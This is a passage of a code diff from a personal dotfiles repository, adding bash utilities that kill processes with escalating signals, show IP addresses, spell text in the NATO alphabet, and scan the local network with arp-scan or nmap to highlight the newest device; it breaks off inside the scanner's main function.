# Script Name: murder
# Description: Gracefully terminate processes with escalating signals
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
# Usage: murder 1234      # kill PID
#        murder :8080     # kill process on port 8080
#        murder firefox   # kill process by name
#        murder           # interactive fzf picker (integrated with your k alias!)

# Signal escalation: [signal, wait_seconds]
# SIGTERM (15) -> SIGINT (2) -> SIGHUP (1) -> SIGKILL (9)
# Each entry is "<signal-number> <seconds-to-wait-after-sending>"; SIGKILL
# gets no wait because nothing can run after it.
SIGNALS=("15 3" "2 3" "1 4" "9 0")
|
||||||
|
|
||||||
|
murder_pid() {
  # Terminate one process by escalating through the SIGNALS table.
  #   $1 - PID to terminate
  # Returns 0 once the process is gone, 1 if it never existed or survives
  # even SIGKILL.
  local pid=$1

  if ! ps -p "$pid" > /dev/null 2>&1; then
    echo "Process $pid not found" >&2
    return 1
  fi

  # Declare and assign separately so a ps failure is not masked by `local`
  # (SC2155); fall back to "unknown" if the process vanished meanwhile.
  local process_name
  process_name=$(ps -p "$pid" -o comm= 2>/dev/null || echo "unknown")
  echo "Terminating $process_name (PID: $pid)..."

  # Keep loop state local instead of leaking sig/wait into the global scope.
  local sig_wait sig wait
  for sig_wait in "${SIGNALS[@]}"; do
    read -r sig wait <<< "$sig_wait"

    # Stop escalating as soon as the process is gone.
    if ! ps -p "$pid" > /dev/null 2>&1; then
      echo "✓ Process terminated successfully"
      return 0
    fi

    case $sig in
      15) echo "  → Sending SIGTERM (polite shutdown)..." ;;
      2) echo "  → Sending SIGINT (interrupt)..." ;;
      1) echo "  → Sending SIGHUP (hangup)..." ;;
      9) echo "  → Sending SIGKILL (force kill)..." ;;
    esac

    # The process may die between the aliveness check and the kill; ignore
    # errors so `set -e` does not abort the escalation.
    kill -"$sig" "$pid" 2>/dev/null || true

    # Give the process time to react before the next, harsher signal.
    if [[ $wait -gt 0 ]]; then
      sleep "$wait"
    fi
  done

  if ps -p "$pid" > /dev/null 2>&1; then
    echo "✗ Failed to terminate process" >&2
    return 1
  fi

  echo "✓ Process terminated"
}
|
||||||
|
|
||||||
|
# If no arguments, use fzf to select process (like your k alias!)
if [[ $# -eq 0 ]]; then
  if ! command -v fzf &>/dev/null; then
    echo "Error: fzf not found. Install fzf or provide PID/name/port as argument." >&2
    exit 1
  fi

  selected=$(ps aux | fzf --header="Select process to terminate (graceful escalation)" \
    --header-lines=1 \
    --preview='echo "Will attempt: SIGTERM → SIGINT → SIGHUP → SIGKILL"')

  if [[ -n "$selected" ]]; then
    # PID is the second column of `ps aux` output.
    pid=$(echo "$selected" | awk '{print $2}')
    murder_pid "$pid"
  fi
  exit 0
fi

# Parse argument: PID, :port, or process name
arg="$1"

if [[ "$arg" =~ ^[0-9]+$ ]]; then
  # Argument is a PID
  murder_pid "$arg"
elif [[ "$arg" =~ ^:[0-9]+$ ]]; then
  # Argument is a port (e.g., :8080)
  port="${arg:1}"
  pid=$(lsof -ti ":$port" 2>/dev/null || true)

  if [[ -z "$pid" ]]; then
    echo "No process found listening on port $port" >&2
    exit 1
  fi

  echo "Found process on port $port:"
  ps -p "$pid" -o pid,comm,args | tail -1
  murder_pid "$pid"
else
  # Argument is a process name
  pids=$(pgrep -f "$arg" || true)

  if [[ -z "$pids" ]]; then
    echo "No processes found matching: $arg" >&2
    exit 1
  fi

  # If multiple processes, show list and let user choose
  count=$(echo "$pids" | wc -l)
  if [[ $count -gt 1 ]]; then
    echo "Multiple processes found matching '$arg':"
    # shellcheck disable=SC2086 -- $pids is intentionally word-split so ps
    # receives one argument per PID.
    ps -p $pids -o pid,comm,args

    if command -v fzf &>/dev/null; then
      selected=$(ps -p $pids | fzf --header-lines=1)
      if [[ -n "$selected" ]]; then
        pid=$(echo "$selected" | awk '{print $1}')
        murder_pid "$pid"
      fi
    else
      echo -n "Enter PID to terminate: "
      # -r keeps backslashes in the typed PID literal (fixes SC2162).
      read -r pid
      murder_pid "$pid"
    fi
  else
    murder_pid "$pids"
  fi
fi
|
||||||
248
scripts/myip
Executable file
248
scripts/myip
Executable file
|
|
@ -0,0 +1,248 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: myip
# Description: Show external and internal IP addresses with optional features
# Usage: myip      # Show all IPs
#        myip -e   # External IP only
#        myip -i   # Internal IPs only
#        myip -c   # Copy external IP to clipboard
#        myip -j   # JSON output
#        myip -a   # All info (IPs + gateway + DNS)

VERSION="1.0.0"

# Colors
# Single-quoted, so each variable holds a literal backslash escape sequence;
# it only renders as color when printed with `echo -e`.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
show_help() {
  # Print the CLI help text to stdout. `echo -e` is required so the color
  # variables (literal "\033[..." sequences) render as ANSI escapes.
  echo -e "${BOLD}myip${NC} - IP Address Information Tool v${VERSION}"
  echo
  echo -e "${BOLD}USAGE:${NC}"
  echo "  myip [OPTIONS]"
  echo
  echo -e "${BOLD}OPTIONS:${NC}"
  echo -e "  ${CYAN}-e, --external${NC} Show external IP only"
  echo -e "  ${CYAN}-i, --internal${NC} Show internal IPs only"
  echo -e "  ${CYAN}-c, --copy${NC} Copy external IP to clipboard"
  echo -e "  ${CYAN}-j, --json${NC} Output as JSON"
  echo -e "  ${CYAN}-a, --all${NC} Show all network info (IPs + gateway + DNS)"
  echo -e "  ${CYAN}-h, --help${NC} Show this help message"
  echo
  echo -e "${BOLD}EXAMPLES:${NC}"
  echo "  myip # Show both external and internal IPs"
  echo "  myip -e # External IP only"
  echo "  myip -c # Copy external IP to clipboard"
  echo "  myip -j # JSON format for scripting"
  echo "  myip -a # Complete network information"
  echo
  echo -e "${BOLD}OUTPUT:${NC}"
  echo "  External IP, Internal IPs, Gateway (with -a), DNS servers (with -a)"
}
|
||||||
|
|
||||||
|
# Get external IP with fallback sources
get_external_ip() {
  # Query public echo-IP services until one returns a plausible IPv4
  # address; print it and return 0. Returns 1 when every source fails.
  local ip=""

  # Try multiple sources for reliability. Declared local so the list and
  # the loop variable no longer leak into the global scope (original bug).
  local -a sources=(
    "https://ifconfig.me"
    "https://api.ipify.org"
    "https://icanhazip.com"
    "https://checkip.amazonaws.com"
  )

  local source
  for source in "${sources[@]}"; do
    # -f fails on HTTP errors; the short timeout keeps the fallback chain
    # snappy; tr strips the trailing newline/whitespace.
    ip=$(curl -sf --max-time 3 "$source" 2>/dev/null | tr -d '[:space:]')
    # Accept only a dotted quad — guards against HTML error pages.
    if [[ -n "$ip" ]] && [[ "$ip" =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
      echo "$ip"
      return 0
    fi
  done

  echo "unable to fetch" >&2
  return 1
}
|
||||||
|
|
||||||
|
# Get internal IPs
get_internal_ips() {
  # Print every non-loopback IPv4 address on this host, one per line.
  # Prefers iproute2's `ip`, falls back to `ifconfig`; returns 1 when
  # neither tool exists.
  if command -v ip &>/dev/null; then
    # Modern Linux: pull the address that follows "inet ".
    ip -4 addr show | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | grep -v '127.0.0.1'
    return
  fi

  if command -v ifconfig &>/dev/null; then
    # macOS / older Linux: isolate dotted quads from the inet lines.
    ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'
    return
  fi

  echo "No network tools found" >&2
  return 1
}
|
||||||
|
|
||||||
|
# Get internal IPs with interface names
get_internal_ips_detailed() {
  # Print "iface:ip" for every non-loopback IPv4 address; consumed by
  # colorized_output's `IFS=: read` loop. Silently prints nothing when
  # neither `ip` nor `ifconfig` is available.
  if command -v ip &>/dev/null; then
    # iproute2: remember the interface name from its numbered header line,
    # then emit it with each inet address (CIDR suffix stripped).
    ip -4 addr show | awk '
      /^[0-9]+:/ { iface = $2; gsub(/:/, "", iface) }
      /inet / && !/127\.0\.0\.1/ {
        split($2, a, "/")
        print iface ":" a[1]
      }
    '
  elif command -v ifconfig &>/dev/null; then
    # ifconfig: an interface block starts at column 0; scan its inet lines
    # and print the token following "inet".
    ifconfig | awk '
      /^[a-z]/ { iface = $1; gsub(/:/, "", iface) }
      /inet / && !/127\.0\.0\.1/ {
        for (i=1; i<=NF; i++) {
          if ($i == "inet") {
            print iface ":" $(i+1)
            break
          }
        }
      }
    '
  fi
}
|
||||||
|
|
||||||
|
# Get default gateway
get_gateway() {
  # Print the default route's gateway address. Tries iproute2, then
  # net-tools `route`, then `netstat`; prints "unknown" when none exist.
  if command -v ip &>/dev/null; then
    ip route | grep default | awk '{print $3}' | head -1
    return
  fi

  if command -v route &>/dev/null; then
    route -n | grep '^0.0.0.0' | awk '{print $2}' | head -1
    return
  fi

  if command -v netstat &>/dev/null; then
    netstat -rn | grep default | awk '{print $2}' | head -1
    return
  fi

  echo "unknown"
}
|
||||||
|
|
||||||
|
# Get DNS servers
get_dns_servers() {
  # Print the configured DNS servers space-separated (no trailing newline);
  # prints "unknown" when /etc/resolv.conf does not exist.
  if [[ ! -f /etc/resolv.conf ]]; then
    echo "unknown"
    return
  fi
  grep nameserver /etc/resolv.conf | awk '{print $2}' | tr '\n' ' '
}
|
||||||
|
|
||||||
|
# JSON output
json_output() {
  # Emit one JSON object with external IP, internal IPs, gateway and DNS.
  # NOTE(review): the lists are assembled with sed, so an empty result
  # renders as [""] rather than [] — confirm consumers tolerate that.
  # NOTE(review): `local x=$(cmd)` masks each command's exit status (SC2155);
  # here that is relied on so a get_external_ip failure falls back cleanly.
  local external_ip=$(get_external_ip || echo "unknown")
  local internal_ips=$(get_internal_ips | tr '\n' ',' | sed 's/,$//')
  local gateway=$(get_gateway)
  local dns=$(get_dns_servers)

  cat << EOF
{
  "external_ip": "$external_ip",
  "internal_ips": [$( echo "$internal_ips" | sed 's/,/","/g; s/^/"/; s/$/"/' )],
  "gateway": "$gateway",
  "dns_servers": [$( echo "$dns" | sed 's/ /","/g; s/^/"/; s/$/"/' )]
}
EOF
}
|
||||||
|
|
||||||
|
# Colorized output
colorized_output() {
  # Human-readable, color-coded report.
  #   $1 - show external IP  ("true"/"false", default true)
  #   $2 - show internal IPs ("true"/"false", default true)
  #   $3 - also show gateway + DNS ("true"/"false", default false)
  local show_external=${1:-true}
  local show_internal=${2:-true}
  local show_all=${3:-false}

  if [[ "$show_external" == "true" ]]; then
    echo -e "${BOLD}${CYAN}External IP:${NC}"
    # The `||` absorbs a lookup failure (keeps `set -e` from killing the
    # script) and substitutes a colored error string instead.
    external_ip=$(get_external_ip || echo "${RED}Unable to fetch${NC}")
    echo -e "  ${GREEN}$external_ip${NC}"
    echo
  fi

  if [[ "$show_internal" == "true" ]]; then
    echo -e "${BOLD}${CYAN}Internal IPs:${NC}"
    # Records arrive as "iface:ip" lines from get_internal_ips_detailed.
    while IFS=: read -r iface ip; do
      echo -e "  ${YELLOW}$iface${NC}: ${GREEN}$ip${NC}"
    done < <(get_internal_ips_detailed)
    echo
  fi

  if [[ "$show_all" == "true" ]]; then
    echo -e "${BOLD}${CYAN}Gateway:${NC}"
    echo -e "  ${GREEN}$(get_gateway)${NC}"
    echo

    echo -e "${BOLD}${CYAN}DNS Servers:${NC}"
    # Unquoted expansion is intentional: the list is space-separated.
    for dns in $(get_dns_servers); do
      echo -e "  ${GREEN}$dns${NC}"
    done
    echo
  fi
}
|
||||||
|
|
||||||
|
# Parse arguments
# Defaults: show both IP families of info, plain colorized output.
mode="default"
show_external=true
show_internal=true
show_all=false
copy_to_clipboard=false
json_format=false

while [[ $# -gt 0 ]]; do
  case $1 in
    -e|--external)
      show_external=true
      show_internal=false
      shift
      ;;
    -i|--internal)
      show_external=false
      show_internal=true
      shift
      ;;
    -c|--copy)
      copy_to_clipboard=true
      shift
      ;;
    -j|--json)
      json_format=true
      shift
      ;;
    -a|--all)
      show_all=true
      shift
      ;;
    -h|--help)
      show_help
      exit 0
      ;;
    *)
      # -e is required so the color variables render as ANSI escapes;
      # without it the user sees a literal "\033[0;31m" (original bug).
      echo -e "${RED}Error: Unknown option: $1${NC}" >&2
      echo "Run 'myip --help' for usage information" >&2
      exit 1
      ;;
  esac
done
|
||||||
|
|
||||||
|
# Clipboard helper
clip_set() {
  # Pipe stdin into whichever X clipboard tool exists (xsel preferred,
  # then xclip); silently does nothing when neither is installed.
  if command -v xsel &>/dev/null; then
    xsel --input --clipboard
    return
  fi
  if command -v xclip &>/dev/null; then
    xclip -selection clipboard
  fi
}
|
||||||
|
|
||||||
|
# Main logic
# Dispatch on the mutually exclusive output modes: JSON wins over clipboard,
# which wins over the default colorized report.
if [[ "$json_format" == "true" ]]; then
  json_output
elif [[ "$copy_to_clipboard" == "true" ]]; then
  external_ip=$(get_external_ip)
  # -n: copy the bare address without a trailing newline.
  echo -n "$external_ip" | clip_set
  echo -e "${GREEN}✓${NC} Copied to clipboard: ${BOLD}$external_ip${NC}"
else
  colorized_output "$show_external" "$show_internal" "$show_all"
fi
|
||||||
43
scripts/nato
Executable file
43
scripts/nato
Executable file
|
|
@ -0,0 +1,43 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: nato
# Description: Convert strings to NATO phonetic alphabet
# Source: Inspired by https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: nato bar          # Output: Bravo Alfa Romeo
#        nato "hello 123"

if [[ $# -eq 0 ]]; then
  echo "Usage: nato <string>" >&2
  exit 1
fi

# NATO phonetic alphabet mapping (letters and digits)
declare -A nato_map=(
  [a]="Alfa" [b]="Bravo" [c]="Charlie" [d]="Delta" [e]="Echo"
  [f]="Foxtrot" [g]="Golf" [h]="Hotel" [i]="India" [j]="Juliett"
  [k]="Kilo" [l]="Lima" [m]="Mike" [n]="November" [o]="Oscar"
  [p]="Papa" [q]="Quebec" [r]="Romeo" [s]="Sierra" [t]="Tango"
  [u]="Uniform" [v]="Victor" [w]="Whiskey" [x]="Xray" [y]="Yankee"
  [z]="Zulu"
  [0]="Zero" [1]="One" [2]="Two" [3]="Three" [4]="Four"
  [5]="Five" [6]="Six" [7]="Seven" [8]="Eight" [9]="Niner"
)

# Normalize all arguments to lowercase, then walk the string one
# character at a time by index.
input="$(echo "$*" | tr '[:upper:]' '[:lower:]')"

result=()
for (( i = 0; i < ${#input}; i++ )); do
  ch=${input:i:1}
  if [[ -n "${nato_map[$ch]:-}" ]]; then
    # Letter or digit: emit its code word.
    result+=("${nato_map[$ch]}")
  elif [[ "$ch" == " " ]]; then
    result+=("/") # Use / as space separator
  fi
  # Any other character (punctuation etc.) is silently dropped.
done

# Output with spaces between words
echo "${result[*]}"
|
||||||
476
scripts/network-discovery.sh
Executable file
476
scripts/network-discovery.sh
Executable file
|
|
@ -0,0 +1,476 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: network-discovery.sh
# Description: Discover devices on local network and highlight the newest device
# Version: 1.0.0
# Dependencies: arp-scan (or nmap), gum (optional but recommended)

# === Configuration ===
# NOTE(review): SCRIPT_DIR is not referenced in the visible portion of this
# script — confirm before removing.
readonly SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
readonly VERSION="1.0.0"

# Per-run log file; $$ keeps concurrent runs from clobbering each other.
# Deliberately NOT readonly yet: the fallback below must be able to reassign
# it (the original marked it readonly first, so the `LOGFILE="/dev/null"`
# fallback failed and, under `set -e`, aborted the whole script).
LOGFILE="${LOGFILE:-/tmp/$(basename "$0" .sh)-$$.log}"

# Ensure log file is writable; otherwise log to the bit bucket.
touch "$LOGFILE" 2>/dev/null || LOGFILE="/dev/null"
readonly LOGFILE
chmod 644 "$LOGFILE" 2>/dev/null || true

# Colors for output (literal escape sequences; rendered via echo -e)
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# === Logging Functions ===
# Timestamped loggers: every message goes to the console AND is appended to
# $LOGFILE. log_error additionally routes the console copy to stderr.
log() {
  printf '[%s] [INFO] %s\n' "$(date '+%Y-%m-%d %H:%M:%S')" "$*" | tee -a "$LOGFILE"
}

log_error() {
  printf '[%s] [ERROR] %s\n' "$(date '+%Y-%m-%d %H:%M:%S')" "$*" | tee -a "$LOGFILE" >&2
}

log_warn() {
  printf '[%s] [WARN] %s\n' "$(date '+%Y-%m-%d %H:%M:%S')" "$*" | tee -a "$LOGFILE"
}
|
||||||
|
|
||||||
|
# === Cleanup Handler ===
# Paths appended to TEMP_FILES are removed when the script exits.
TEMP_FILES=()

cleanup() {
  # Runs on EXIT/INT/TERM (see trap below). Captures $? first so the
  # script's real exit status is preserved through the cleanup work.
  local exit_code=$?

  # Clean temp files
  # NOTE(review): expanding "${TEMP_FILES[@]}" while the array is empty
  # trips `set -u` on bash < 4.4 — confirm the target bash version.
  for file in "${TEMP_FILES[@]}"; do
    [[ -f "$file" ]] && rm -f "$file"
  done

  # Clean log file on successful completion; keep it for post-mortem when
  # the script failed.
  if [[ $exit_code -eq 0 ]] && [[ "$LOGFILE" != "/dev/null" ]]; then
    rm -f "$LOGFILE" 2>/dev/null || true
  fi

  exit $exit_code
}

trap cleanup EXIT INT TERM
|
||||||
|
|
||||||
|
# === Dependency Checking ===
# Globals set here and read throughout the script.
HAS_GUM=false
HAS_ARP_SCAN=false
SCAN_METHOD=""

check_dependencies() {
  # Detect the optional gum UI and choose a scan backend (arp-scan
  # preferred over nmap). Returns 1 when no scanner is available.
  # Check for gum (optional) - check common locations
  if command -v gum &>/dev/null; then
    HAS_GUM=true
  elif [[ -x "$HOME/go/bin/gum" ]]; then
    HAS_GUM=true
    export PATH="$HOME/go/bin:$PATH"
  elif [[ -x "/home/e/go/bin/gum" ]]; then
    # NOTE(review): hard-coded per-user path — only valid on the author's
    # machine; consider removing.
    HAS_GUM=true
    export PATH="/home/e/go/bin:$PATH"
  fi

  # Check for scanning tools
  if command -v arp-scan &>/dev/null; then
    HAS_ARP_SCAN=true
    SCAN_METHOD="arp-scan"
  elif command -v nmap &>/dev/null; then
    SCAN_METHOD="nmap"
    log_warn "Using nmap (arp-scan recommended for better MAC detection)"
  else
    log_error "No network scanning tool found"
    echo "Please install one of:"
    echo "  sudo apt install arp-scan (recommended)"
    echo "  sudo apt install nmap"
    return 1
  fi

  return 0
}
|
||||||
|
|
||||||
|
# === UI Functions ===
show_header() {
  # Clear the screen and print the banner: gum-styled when available,
  # plain box-drawing characters otherwise.
  clear

  if [[ "$HAS_GUM" == "true" ]]; then
    gum style \
      --border thick \
      --border-foreground 12 \
      --align center \
      --width 60 \
      --margin "1" \
      --padding "1 2" \
      "🔍 NETWORK DEVICE DISCOVERY" \
      "" \
      "v${VERSION}" \
      "Scanning local network..."
    echo
  else
    echo -e "${BLUE}╔════════════════════════════════════════════════════╗${NC}"
    echo -e "${BLUE}║${NC} 🔍 ${BOLD}NETWORK DEVICE DISCOVERY${NC} ${BLUE}║${NC}"
    echo -e "${BLUE}║${NC} ${BLUE}║${NC}"
    echo -e "${BLUE}║${NC} v${VERSION} ${BLUE}║${NC}"
    echo -e "${BLUE}║${NC} Scanning local network... ${BLUE}║${NC}"
    echo -e "${BLUE}╚════════════════════════════════════════════════════╝${NC}"
    echo
  fi
}
|
||||||
|
|
||||||
|
# === Network Functions ===
get_local_network() {
  # Derive the local subnet in CIDR form (assumed /24) from the default
  # gateway; prints e.g. "192.168.1.0/24". Returns 1 (after logging) when
  # no default route exists.
  local gw prefix

  gw=$(ip route | grep default | awk '{print $3}' | head -n1)
  if [[ -z "$gw" ]]; then
    log_error "Could not determine default gateway"
    return 1
  fi

  # Keep the gateway's first three octets; assume a /24 network.
  prefix=$(echo "$gw" | cut -d. -f1-3)
  echo "${prefix}.0/24"
}
|
||||||
|
|
||||||
|
scan_network_arp_scan() {
  # Run arp-scan on the local network, echoing raw output to the console
  # and capturing it into $2. With gum, the scan runs in the background
  # behind a spinner.
  #   $1 - CIDR network (unused here; --localnet rescans automatically)
  #   $2 - file to receive the raw scanner output
  local network="$1"
  local output_file="$2"

  if [[ "$HAS_GUM" == "true" ]]; then
    echo -e "${CYAN}🔍 Scanning network with arp-scan...${NC}"
    # Try a wired interface first, then wireless, then let arp-scan pick.
    (
      sudo arp-scan --interface=eth0 --localnet 2>/dev/null || \
      sudo arp-scan --interface=wlan0 --localnet 2>/dev/null || \
      sudo arp-scan --localnet 2>/dev/null
    ) | tee "$output_file" &

    local scan_pid=$!
    # Spinner options: dot, pulse, points, minidot, line, jump, globe, moon, monkey, meter, hamburger
    # gum spin blocks while polling the background pipeline's PID.
    gum spin --spinner pulse --title "Scanning local network..." -- bash -c "while kill -0 $scan_pid 2>/dev/null; do sleep 0.1; done"
    wait $scan_pid
  else
    echo -e "${CYAN}⏳ Scanning network with arp-scan...${NC}"
    sudo arp-scan --localnet 2>/dev/null | tee "$output_file"
  fi
}
|
||||||
|
|
||||||
|
scan_network_nmap() {
  # nmap fallback scanner: ping/ARP sweep (-sn -PR) of the given network,
  # echoed to the console and captured into $2. With gum, the scan runs in
  # the background behind a spinner.
  #   $1 - CIDR network to sweep
  #   $2 - file to receive the raw scanner output
  local network="$1"
  local output_file="$2"

  if [[ "$HAS_GUM" == "true" ]]; then
    echo -e "${CYAN}🔍 Scanning network with nmap...${NC}"
    (
      sudo nmap -sn -PR "$network" 2>/dev/null
    ) | tee "$output_file" &

    local scan_pid=$!
    # Spinner options: dot, pulse, points, minidot, line, jump, globe, moon, monkey, meter, hamburger
    gum spin --spinner pulse --title "Scanning local network..." -- bash -c "while kill -0 $scan_pid 2>/dev/null; do sleep 0.1; done"
    wait $scan_pid
  else
    echo -e "${CYAN}⏳ Scanning network with nmap...${NC}"
    sudo nmap -sn -PR "$network" 2>/dev/null | tee "$output_file"
  fi
}
|
||||||
|
|
||||||
|
parse_arp_scan_results() {
  # Convert raw arp-scan output into "IP|MAC|Vendor" records, one per line.
  # Pipe-delimited because vendor strings may themselves contain commas.
  #   $1 - raw arp-scan output file
  #   $2 - destination results file
  local raw_file="$1"
  local parsed_file="$2"

  # Keep only lines containing an IPv4 address, drop arp-scan's chrome,
  # then rebuild each record keeping the whole vendor name (fields 3..NF).
  grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}" "$raw_file" \
    | grep -v "^Interface\|^Starting\|^Ending\|packets received" \
    | awk '{
        addr = $1
        hw = $2
        name = $3
        for (i = 4; i <= NF; i++) name = name " " $i
        if (name == "") name = "Unknown"
        print addr "|" hw "|" name
      }' > "$parsed_file"
}
|
||||||
|
|
||||||
|
parse_nmap_results() {
  # Convert `nmap -sn` output into "IP|MAC|Vendor" lines — the SAME
  # pipe-delimited format as parse_arp_scan_results. (The original emitted
  # comma-delimited records, which broke find_newest_device and
  # display_results: both split on '|'.)
  #   $1 - raw nmap output file
  #   $2 - destination results file
  local scan_file="$1"
  local results_file="$2"

  # After nmap scan, check entire ARP cache for all discovered devices
  log "Checking ARP cache for MAC addresses..."

  # Collect every IP nmap reported.
  local found_ips=()
  local line ip
  while read -r line; do
    if [[ "$line" =~ "Nmap scan report for" ]]; then
      ip=$(echo "$line" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}')
      [[ -n "$ip" ]] && found_ips+=("$ip")
    fi
  done < "$scan_file"

  # Resolve each IP's MAC from the ARP cache; guess a vendor from the OUI.
  local arp_line mac vendor
  for ip in "${found_ips[@]}"; do
    # `|| true` so a cache miss (grep exit 1) cannot kill the script under
    # `set -e` — without it the "Unknown" branch below was unreachable.
    arp_line=$(arp -n | grep "^$ip " 2>/dev/null || true)

    if [[ -n "$arp_line" ]]; then
      # Parse: 10.98.0.1 ether aa:bb:cc:dd:ee:ff C eth0
      mac=$(echo "$arp_line" | awk '{print $3}')

      vendor="Unknown"
      if [[ "$mac" =~ ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$ ]]; then
        # Valid MAC: recognize well-known virtual-machine OUIs; everything
        # else is labeled generically.
        case "${mac:0:8}" in
          "00:50:56"|"00:0c:29"|"00:05:69") vendor="VMware" ;;
          "08:00:27") vendor="VirtualBox" ;;
          "52:54:00") vendor="QEMU/KVM" ;;
          *) vendor="Device" ;;
        esac
      fi

      echo "${ip}|${mac}|${vendor}"
    else
      echo "${ip}|Unknown|Unknown"
    fi
  done > "$results_file"
}
|
||||||
|
|
||||||
|
find_newest_device() {
  # Heuristically pick the "newest" device from the scan results.
  #   $1 - results file, one "IP|MAC|Vendor" record per line
  # Prints a single "IP|MAC|Vendor" record on stdout.
  local results_file="$1"

  # Get current ARP cache with timestamps
  local newest_ip=""
  local newest_mac=""
  local newest_vendor=""
  # NOTE(review): newest_age is never updated below — there is no per-entry
  # age available here, so the loop effectively keeps the LAST device that
  # appears in the ARP cache. Confirm this heuristic is intended.
  local newest_age=999999

  # Read results and check ARP cache age (using pipe delimiter)
  while IFS='|' read -r ip mac vendor; do
    [[ -z "$ip" ]] && continue

    # Check if device is in ARP cache
    if arp -n "$ip" &>/dev/null; then
      # Most recently added device will be at the end of the list
      # We'll use the last device found as "newest"
      newest_ip="$ip"
      newest_mac="$mac"
      newest_vendor="$vendor"
    fi
  done < "$results_file"

  # If no ARP cache method works, just take the last device from scan
  if [[ -z "$newest_ip" ]]; then
    local last_line
    last_line=$(tail -n1 "$results_file")
    newest_ip=$(echo "$last_line" | cut -d'|' -f1)
    newest_mac=$(echo "$last_line" | cut -d'|' -f2)
    newest_vendor=$(echo "$last_line" | cut -d'|' -f3)
  fi

  echo "${newest_ip}|${newest_mac}|${newest_vendor}"
}
|
||||||
|
|
||||||
|
display_results() {
  # Render the discovered-device table plus a summary box, highlighting the
  # "newest" device.
  #   $1 - results file ("IP|MAC|Vendor" per line)
  #   $2 - newest-device record ("IP|MAC|Vendor")
  local results_file="$1"
  local newest_device="$2"

  local newest_ip newest_mac newest_vendor
  IFS='|' read -r newest_ip newest_mac newest_vendor <<< "$newest_device"

  echo
  if [[ "$HAS_GUM" == "true" ]]; then
    gum style \
      --border double \
      --border-foreground 10 \
      --padding "1" \
      "📊 Discovered Devices"
    echo
  else
    echo -e "${GREEN}╔══════════════════════════════════════════════════╗${NC}"
    echo -e "${GREEN}║${NC} 📊 Discovered Devices ${GREEN}║${NC}"
    echo -e "${GREEN}╚══════════════════════════════════════════════════╝${NC}"
    echo
  fi

  # Header
  # NOTE(review): color variables inside the printf FORMAT string (SC2059)
  # work here because they contain no % characters — keep it that way.
  printf "${BOLD}%-16s %-20s %-30s${NC}\n" "IP ADDRESS" "MAC ADDRESS" "VENDOR"
  echo "────────────────────────────────────────────────────────────────────"

  # Display all devices - use awk to do ALL the formatting
  local device_count
  device_count=$(wc -l < "$results_file" 2>/dev/null || echo 0)

  # Use awk to format everything directly (avoids pipe/subshell issues).
  # The color codes are passed with -v, where awk expands the \033 escapes.
  awk -F '|' -v newest_ip="$newest_ip" \
    -v MAGENTA="${MAGENTA}" -v CYAN="${CYAN}" -v YELLOW="${YELLOW}" \
    -v GREEN="${GREEN}" -v BOLD="${BOLD}" -v NC="${NC}" \
    '{
    ip=$1
    mac=$2
    vendor=$3

    if (ip == newest_ip) {
      # Newest device - HIGHLIGHT IT!
      printf "%s%s%-16s%s %s%s%-20s%s %s%-30s%s %s⭐ NEWEST%s\n", \
        BOLD, MAGENTA, ip, NC, \
        BOLD, CYAN, mac, NC, \
        YELLOW, vendor, NC, \
        GREEN, NC
    } else {
      printf "%-16s %-20s %-30s\n", ip, mac, vendor
    }
  }' "$results_file"

  echo
  echo -e "${BLUE}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

  # Summary box
  if [[ "$HAS_GUM" == "true" ]]; then
    gum style \
      --border rounded \
      --border-foreground 10 \
      --foreground 10 \
      --padding "1" \
      "✅ Scan Complete!" \
      "" \
      "Total devices found: ${device_count}" \
      "Newest device: ${newest_ip}" \
      "MAC Address: ${newest_mac}" \
      "Vendor: ${newest_vendor}"
  else
    echo
    echo -e "${GREEN}✅ Scan Complete!${NC}"
    echo -e "${BOLD}Total devices found:${NC} ${device_count}"
    echo
    echo -e "${BOLD}${MAGENTA}Newest Device:${NC}"
    echo -e "  ${BOLD}IP:${NC} ${newest_ip}"
    echo -e "  ${BOLD}MAC:${NC} ${newest_mac}"
    echo -e "  ${BOLD}Vendor:${NC} ${newest_vendor}"
  fi

  echo
}
|
||||||
|
|
||||||
|
# === Usage Function ===
usage() {
  # Print CLI help to stdout. The script name is resolved once instead of
  # being recomputed for every line of the here-doc.
  local prog
  prog=$(basename "$0")
  cat << EOF
Usage: ${prog} [OPTIONS]

Description:
  Scan local network for devices and highlight the newest device

Options:
  -h, --help     Show this help message
  -v, --verbose  Enable verbose output

Examples:
  sudo ${prog}
  sudo ${prog} --verbose

Requirements:
  - Must run with sudo (for network scanning)
  - arp-scan or nmap installed
  - gum (optional, for enhanced UI)

EOF
}
|
||||||
|
|
||||||
|
# === Main Logic ===
main() {
  # Orchestrates the run: parse flags, verify privileges and tools, scan,
  # parse, pick the newest device, display, clean up.

  # Parse arguments
  while [[ $# -gt 0 ]]; do
    case "$1" in
      -h|--help)
        usage
        exit 0
        ;;
      -v|--verbose)
        # Trace every command for debugging.
        set -x
        shift
        ;;
      *)
        log_error "Unknown option: $1"
        usage
        exit 1
        ;;
    esac
  done

